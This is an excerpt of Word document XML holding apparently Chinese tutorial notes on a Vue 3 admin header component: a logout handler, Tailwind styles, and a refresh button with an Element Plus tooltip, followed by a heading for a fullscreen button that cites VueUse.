        <w:t>移除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511150CC" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除当前用户状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> vuex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20557069" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    store.dispatch("logout")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C63EDE" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38669281" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转到登录页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520F401F" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    router.push("/login")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1BB643" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="782BE960" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示退出登录成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A4FB31" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    toast("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出登录成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F454F42" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FE6341" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A328B01" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000B8FC4" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569702FB" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A5A3A89" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7284A210" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.f-header {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654A293C" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex items-center bg-indigo-700 text-light-200 fixed top-0 left-0 right-0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691CD283" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    height: 64px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C4E520" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4996C7ED" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3880BDFE" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.logo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E058C85" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    width: 250px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EC9C96" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex items-center justify-center text-xl font-thin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11401145" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E33165" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63EAEBC5" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.icon-btn {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4663DCFA" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex items-center justify-center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002138B1" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    width: 42px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158897EC" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    height: 64px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3439065D" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB5E686" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F596C55" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249DE7ED" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.icon-btn:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D72A11" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply bg-indigo-200;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5175A624" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2973965C" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525C14BF" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.f-header .dropdown {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3194CE9C" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex items-center justify-center mx-5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C70DBD" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    width: 200px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5366E80C" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    height: 64px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE0ECC7" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E84EA8" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225DE468" w14:textId="731E5DFE" w:rsidR="00A92AAA" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07103CE1" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14FC4813" w14:textId="3AA9B6E3" w:rsidR="00A92AAA" w:rsidRDefault="00A25BE5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做刷新图标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C5219C" w14:textId="77777777" w:rsidR="00C76BCB" w:rsidRDefault="00C76BCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CB0AA9" w14:textId="0129553B" w:rsidR="00C76BCB" w:rsidRPr="00C76BCB" w:rsidRDefault="00C76BCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tooltip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FF6EC4" w14:textId="776D43D2" w:rsidR="00A25BE5" w:rsidRDefault="00C76BCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C76BCB">
        <w:t>https://element-plus.org/zh-CN/component/tooltip.html#tooltip-%E6%96%87%E5%AD%97%E6%8F%90%E7%A4%BA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D032625" w14:textId="77777777" w:rsidR="00A25BE5" w:rsidRPr="00A25BE5" w:rsidRDefault="00A25BE5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D65CD8E" w14:textId="382BAD7A" w:rsidR="00A92AAA" w:rsidRDefault="00472DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大概就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tooltip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的标签，把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给包围住</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654C1599" w14:textId="77777777" w:rsidR="00472DA8" w:rsidRDefault="00472DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;el-tooltip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E57336" w14:textId="77777777" w:rsidR="00472DA8" w:rsidRDefault="00472DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        class="box-item"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2781B649" w14:textId="77777777" w:rsidR="00472DA8" w:rsidRDefault="00472DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        effect="dark"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363AD5ED" w14:textId="77777777" w:rsidR="00472DA8" w:rsidRDefault="00472DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        content="Top Left prompts info"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2DC2E9" w14:textId="77777777" w:rsidR="00472DA8" w:rsidRDefault="00472DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        placement="top-start"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189B2802" w14:textId="77777777" w:rsidR="00472DA8" w:rsidRDefault="00472DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135A9385" w14:textId="77777777" w:rsidR="00472DA8" w:rsidRDefault="00472DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-button&gt;top-start&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358B9375" w14:textId="14DA110A" w:rsidR="00A92AAA" w:rsidRDefault="00472DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/el-tooltip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A4C54C" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0530198C" w14:textId="77777777" w:rsidR="00F90048" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3539CB32" w14:textId="31D31260" w:rsidR="00F90048" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FHeader</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AADBA5F" w14:textId="77777777" w:rsidR="00F90048" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F90048">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-tooltip effect="dark" content="</w:t>
      </w:r>
      <w:r w:rsidRPr="00F90048">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>刷新</w:t>
      </w:r>
      <w:r w:rsidRPr="00F90048">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>" placement="bottom"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D38390" w14:textId="77777777" w:rsidR="00F90048" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6AF5DD" w14:textId="77777777" w:rsidR="00F90048" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-icon class="icon-btn" </w:t>
      </w:r>
      <w:r w:rsidRPr="00F90048">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@click="handleRefresh"</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48671539" w14:textId="77777777" w:rsidR="00F90048" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;Refresh /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A601CD" w14:textId="77777777" w:rsidR="00F90048" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9FE3FF" w14:textId="77777777" w:rsidR="00F90048" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A31CDA0" w14:textId="5CFA9543" w:rsidR="00A92AAA" w:rsidRPr="00181907" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F90048">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/el-tooltip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AA44E0" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5620FF5E" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRPr="00181907" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2709D3" w14:textId="77777777" w:rsidR="00F90048" w:rsidRPr="00F90048" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F90048">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00F90048">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>刷新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B0D77F" w14:textId="77777777" w:rsidR="00F90048" w:rsidRPr="00F90048" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F90048">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const handleRefresh = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B47CFB9" w14:textId="77777777" w:rsidR="00F90048" w:rsidRPr="00F90048" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F90048">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    // router.go(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF8A29C" w14:textId="77777777" w:rsidR="00F90048" w:rsidRPr="00F90048" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F90048">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    console.log("</w:t>
      </w:r>
      <w:r w:rsidRPr="00F90048">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>刷新</w:t>
      </w:r>
      <w:r w:rsidRPr="00F90048">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF1A99E" w14:textId="5982F4B4" w:rsidR="00A92AAA" w:rsidRPr="00F90048" w:rsidRDefault="00F90048" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F90048">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404DE87" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D9A980" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E485FC6" w14:textId="71957CD9" w:rsidR="00A92AAA" w:rsidRDefault="000215E6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做全屏按钮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F91EB" w14:textId="0468E4F4" w:rsidR="000215E6" w:rsidRDefault="000215E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vueuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698F2BAF" w14:textId="475CC648" w:rsidR="00A92AAA" w:rsidRDefault="000215E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000215E6">
        <w:t>https://vueuse.org/core/useFullscreen/#usefullscreen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348BC30C" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
